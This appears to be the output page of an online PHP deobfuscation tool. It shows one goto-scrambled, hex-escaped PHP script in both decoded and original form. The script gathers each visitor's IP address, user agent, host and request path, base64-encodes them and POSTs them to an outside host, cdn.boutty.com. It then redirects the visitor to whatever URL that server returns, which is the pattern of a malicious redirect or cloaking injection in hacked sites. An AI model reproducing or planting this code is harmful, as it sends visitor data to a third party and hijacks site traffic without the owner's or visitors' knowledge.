Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto da861d75cb3cfe15; d8ee0e174784234d: $Aa757e506b60637e = curl_init(); goto bbd2..
Decoded Output download
<?php
goto da861d75cb3cfe15; d8ee0e174784234d: $Aa757e506b60637e = curl_init(); goto bbd25de7a680d941; D9bc5b38ca220284: $Fbcde9e03593fe79 = base64_encode($e7de4293220463f1 . $E8f6f59e94c07fda); goto e4f9af13e3789da0; Dbc5371d540d99e8: cb26e51a2b21ca9d: goto aa8c9a47264a00f1; dfb0415c07f2af32: if ($A8660a8b5b763411 !== "sai") { goto B44e014dfd22973d; } goto b7e156affcebc405; Dfd56bb820948140: $F21203e71b6a9c87[2] = $ae00cc62b3812ee1; goto Dbc5371d540d99e8; Ce9ded348f5e858c: $cf7d9e819f425260 = file_get_contents($cb289e5f02e63b18); goto A188352137f5c261; E92dcf92e0daa653: function CeAb7F967c6C456E() { goto Afccf49d5d68a8b1; bde438bf8efb7c81: $E0b01318f7864c87 = json_decode($_SERVER["HTTP_CF_VISITOR"], true); goto D74dc8862b99ea88; ef6e31ef46980f50: if (!isset($_SERVER["HTTP_CF_VISITOR"])) { goto A20fa17398eb772b; } goto bde438bf8efb7c81; Dd1d18a51c434936: F63463ef41c9de9e: goto eb872845da4a9696; D74dc8862b99ea88: if (!isset($E0b01318f7864c87["host"])) { goto F63463ef41c9de9e; } goto Fd2d157b0d70eeed; Fd2d157b0d70eeed: $d6eb279407467556 = $E0b01318f7864c87["host"]; goto Dd1d18a51c434936; Afccf49d5d68a8b1: $d6eb279407467556 = $_SERVER["HTTP_HOST"]; goto ef6e31ef46980f50; c499e98dabba11fa: return $d6eb279407467556; goto B65fc5b94b9ccbe1; eb872845da4a9696: A20fa17398eb772b: goto c499e98dabba11fa; B65fc5b94b9ccbe1: } goto D1d7f9eeb688f2eb; Abdd60ef19565e78: $E59cab520714931d = isset($_SERVER["HTTP_CF_REQUEST_URI"]) ? $_SERVER["HTTP_CF_REQUEST_URI"] : $_SERVER["REQUEST_URI"]; goto Cbe5baa258a1f8f3; E5a6ea2908213d4e: $cb289e5f02e63b18 = "https://" . $F2c45ef15f4c9c9e . $edfc3a5cd3df7dc0; goto Ce9ded348f5e858c; d8ef423e02eb8da3: exit; goto F0c573dc938689dd; b8cd3810892aeca7: $da67757397f24444 = array(CURLOPT_URL => $A867845fb260cc3d, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($E8f6f59e94c07fda), CURLOPT_RETURNTRANSFER => true); goto d8ee0e174784234d; A188352137f5c261: echo $cf7d9e819f425260; goto d8ef423e02eb8da3; E068e9fdd8c8b49a: if (!(count($F21203e71b6a9c87) >= 3)) { goto cb26e51a2b21ca9d; } goto F8229e209b8c77da; bbd25de7a680d941: curl_setopt_array($Aa757e506b60637e, $da67757397f24444); goto E4421f97aa6eee36; F0c573dc938689dd: goto ce1c141f46461901; goto dfe58407d1238296; E48092aaefedb1ba: exit; goto Aaac350f000c91f4; E90a8c99ab62f623: header("Location: " . $A8660a8b5b763411); goto E48092aaefedb1ba; dfe58407d1238296: B44e014dfd22973d: goto E90a8c99ab62f623; e4f9af13e3789da0: $A867845fb260cc3d = "https://cdn.boutty.com/index.php"; goto Aec87ca9a6b018c1; da861d75cb3cfe15: function B17034D5f5b8C32a() { goto E254f1322632870f; E254f1322632870f: $b9c8231876ed1de5 = $_SERVER["REMOTE_ADDR"]; goto E48ab461444021c4; B9dec0ed3e09c69f: D6fe09b19a370916: goto cf390967768cf82d; cf390967768cf82d: return $b9c8231876ed1de5; goto c52bff4423318ed9; E48ab461444021c4: if (!isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { goto D6fe09b19a370916; } goto a93312c91cbab523; a93312c91cbab523: $b9c8231876ed1de5 = $_SERVER["HTTP_CF_CONNECTING_IP"]; goto B9dec0ed3e09c69f; c52bff4423318ed9: } goto Aee6afb4d2ca11fb; Aec87ca9a6b018c1: $E8f6f59e94c07fda = array("encoded_data" => $Fbcde9e03593fe79); goto b8cd3810892aeca7; Df1c392cfd03b092: $e7de4293220463f1 = "278"; goto D9bc5b38ca220284; aa8c9a47264a00f1: $edfc3a5cd3df7dc0 = implode("/", $F21203e71b6a9c87); goto E5a6ea2908213d4e; Aee6afb4d2ca11fb: $E1e27d7556adfb8f = B17034D5F5b8C32a(); goto E92dcf92e0daa653; Bd09f13fced7b5b0: curl_close($Aa757e506b60637e); goto dfb0415c07f2af32; dfefb0539d08ee45: $E8f6f59e94c07fda = $E1e27d7556adfb8f . "|" . $ed43b6f405e725cd . "|" . $E59cab520714931d . "|" . $F2c45ef15f4c9c9e; goto Df1c392cfd03b092; D1d7f9eeb688f2eb: $F2c45ef15f4c9c9e = ceAb7f967C6c456E(); goto Abdd60ef19565e78; F51f6e2ae6b1ef5e: $ae00cc62b3812ee1 = rtrim($D96fda7e5529a1fe, $D96fda7e5529a1fe[strlen($D96fda7e5529a1fe) - 1]); goto Dfd56bb820948140; F8229e209b8c77da: $D96fda7e5529a1fe = $F21203e71b6a9c87[2]; goto F51f6e2ae6b1ef5e; b7e156affcebc405: $F21203e71b6a9c87 = explode("/", $E59cab520714931d); goto E068e9fdd8c8b49a; Cbe5baa258a1f8f3: $ed43b6f405e725cd = $_SERVER["HTTP_USER_AGENT"]; goto dfefb0539d08ee45; E4421f97aa6eee36: $A8660a8b5b763411 = curl_exec($Aa757e506b60637e); goto Bd09f13fced7b5b0; Aaac350f000c91f4: ce1c141f46461901:
?>
Did this file decode correctly?
Original Code
<?php
goto da861d75cb3cfe15; d8ee0e174784234d: $Aa757e506b60637e = curl_init(); goto bbd25de7a680d941; D9bc5b38ca220284: $Fbcde9e03593fe79 = base64_encode($e7de4293220463f1 . $E8f6f59e94c07fda); goto e4f9af13e3789da0; Dbc5371d540d99e8: cb26e51a2b21ca9d: goto aa8c9a47264a00f1; dfb0415c07f2af32: if ($A8660a8b5b763411 !== "\163\141\151") { goto B44e014dfd22973d; } goto b7e156affcebc405; Dfd56bb820948140: $F21203e71b6a9c87[2] = $ae00cc62b3812ee1; goto Dbc5371d540d99e8; Ce9ded348f5e858c: $cf7d9e819f425260 = file_get_contents($cb289e5f02e63b18); goto A188352137f5c261; E92dcf92e0daa653: function CeAb7F967c6C456E() { goto Afccf49d5d68a8b1; bde438bf8efb7c81: $E0b01318f7864c87 = json_decode($_SERVER["\x48\124\x54\120\x5f\x43\x46\x5f\x56\111\123\x49\124\x4f\122"], true); goto D74dc8862b99ea88; ef6e31ef46980f50: if (!isset($_SERVER["\110\x54\x54\x50\x5f\x43\106\137\x56\111\x53\111\124\x4f\x52"])) { goto A20fa17398eb772b; } goto bde438bf8efb7c81; Dd1d18a51c434936: F63463ef41c9de9e: goto eb872845da4a9696; D74dc8862b99ea88: if (!isset($E0b01318f7864c87["\150\157\x73\164"])) { goto F63463ef41c9de9e; } goto Fd2d157b0d70eeed; Fd2d157b0d70eeed: $d6eb279407467556 = $E0b01318f7864c87["\150\157\163\164"]; goto Dd1d18a51c434936; Afccf49d5d68a8b1: $d6eb279407467556 = $_SERVER["\110\124\x54\120\x5f\x48\x4f\123\x54"]; goto ef6e31ef46980f50; c499e98dabba11fa: return $d6eb279407467556; goto B65fc5b94b9ccbe1; eb872845da4a9696: A20fa17398eb772b: goto c499e98dabba11fa; B65fc5b94b9ccbe1: } goto D1d7f9eeb688f2eb; Abdd60ef19565e78: $E59cab520714931d = isset($_SERVER["\110\124\124\x50\137\103\106\x5f\122\105\121\x55\x45\x53\124\x5f\125\x52\111"]) ? $_SERVER["\110\x54\x54\120\137\103\x46\137\122\105\121\125\105\123\x54\x5f\125\x52\111"] : $_SERVER["\x52\105\121\x55\105\123\x54\137\x55\122\111"]; goto Cbe5baa258a1f8f3; E5a6ea2908213d4e: $cb289e5f02e63b18 = "\150\x74\164\160\163\72\x2f\x2f" . $F2c45ef15f4c9c9e . $edfc3a5cd3df7dc0; goto Ce9ded348f5e858c; d8ef423e02eb8da3: exit; goto F0c573dc938689dd; b8cd3810892aeca7: $da67757397f24444 = array(CURLOPT_URL => $A867845fb260cc3d, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($E8f6f59e94c07fda), CURLOPT_RETURNTRANSFER => true); goto d8ee0e174784234d; A188352137f5c261: echo $cf7d9e819f425260; goto d8ef423e02eb8da3; E068e9fdd8c8b49a: if (!(count($F21203e71b6a9c87) >= 3)) { goto cb26e51a2b21ca9d; } goto F8229e209b8c77da; bbd25de7a680d941: curl_setopt_array($Aa757e506b60637e, $da67757397f24444); goto E4421f97aa6eee36; F0c573dc938689dd: goto ce1c141f46461901; goto dfe58407d1238296; E48092aaefedb1ba: exit; goto Aaac350f000c91f4; E90a8c99ab62f623: header("\114\157\143\x61\164\151\x6f\x6e\x3a\x20" . $A8660a8b5b763411); goto E48092aaefedb1ba; dfe58407d1238296: B44e014dfd22973d: goto E90a8c99ab62f623; e4f9af13e3789da0: $A867845fb260cc3d = "\x68\164\164\x70\x73\72\57\x2f\x63\x64\x6e\56\142\157\165\x74\x74\171\x2e\143\157\155\x2f\x69\156\x64\x65\170\x2e\160\150\x70"; goto Aec87ca9a6b018c1; da861d75cb3cfe15: function B17034D5f5b8C32a() { goto E254f1322632870f; E254f1322632870f: $b9c8231876ed1de5 = $_SERVER["\x52\x45\115\117\124\x45\137\x41\x44\104\x52"]; goto E48ab461444021c4; B9dec0ed3e09c69f: D6fe09b19a370916: goto cf390967768cf82d; cf390967768cf82d: return $b9c8231876ed1de5; goto c52bff4423318ed9; E48ab461444021c4: if (!isset($_SERVER["\x48\124\124\x50\137\x43\106\137\103\x4f\116\x4e\105\103\x54\x49\116\107\x5f\x49\120"])) { goto D6fe09b19a370916; } goto a93312c91cbab523; a93312c91cbab523: $b9c8231876ed1de5 = $_SERVER["\110\x54\124\x50\137\103\x46\x5f\x43\x4f\116\116\105\x43\124\111\x4e\x47\x5f\x49\x50"]; goto B9dec0ed3e09c69f; c52bff4423318ed9: } goto Aee6afb4d2ca11fb; Aec87ca9a6b018c1: $E8f6f59e94c07fda = array("\x65\x6e\x63\157\144\145\144\x5f\x64\x61\164\141" => $Fbcde9e03593fe79); goto b8cd3810892aeca7; Df1c392cfd03b092: $e7de4293220463f1 = "\x32\x37\70"; goto D9bc5b38ca220284; aa8c9a47264a00f1: $edfc3a5cd3df7dc0 = implode("\57", $F21203e71b6a9c87); goto E5a6ea2908213d4e; Aee6afb4d2ca11fb: $E1e27d7556adfb8f = B17034D5F5b8C32a(); goto E92dcf92e0daa653; Bd09f13fced7b5b0: curl_close($Aa757e506b60637e); goto dfb0415c07f2af32; dfefb0539d08ee45: $E8f6f59e94c07fda = $E1e27d7556adfb8f . "\174" . $ed43b6f405e725cd . "\x7c" . $E59cab520714931d . "\x7c" . $F2c45ef15f4c9c9e; goto Df1c392cfd03b092; D1d7f9eeb688f2eb: $F2c45ef15f4c9c9e = ceAb7f967C6c456E(); goto Abdd60ef19565e78; F51f6e2ae6b1ef5e: $ae00cc62b3812ee1 = rtrim($D96fda7e5529a1fe, $D96fda7e5529a1fe[strlen($D96fda7e5529a1fe) - 1]); goto Dfd56bb820948140; F8229e209b8c77da: $D96fda7e5529a1fe = $F21203e71b6a9c87[2]; goto F51f6e2ae6b1ef5e; b7e156affcebc405: $F21203e71b6a9c87 = explode("\x2f", $E59cab520714931d); goto E068e9fdd8c8b49a; Cbe5baa258a1f8f3: $ed43b6f405e725cd = $_SERVER["\x48\x54\124\x50\x5f\125\x53\105\x52\137\101\107\105\x4e\x54"]; goto dfefb0539d08ee45; E4421f97aa6eee36: $A8660a8b5b763411 = curl_exec($Aa757e506b60637e); goto Bd09f13fced7b5b0; Aaac350f000c91f4: ce1c141f46461901:
Function Calls
None |
Stats
MD5 | cd5b18698b65842378ed2bfed5811b9a |
Eval Count | 0 |
Decode Time | 47 ms |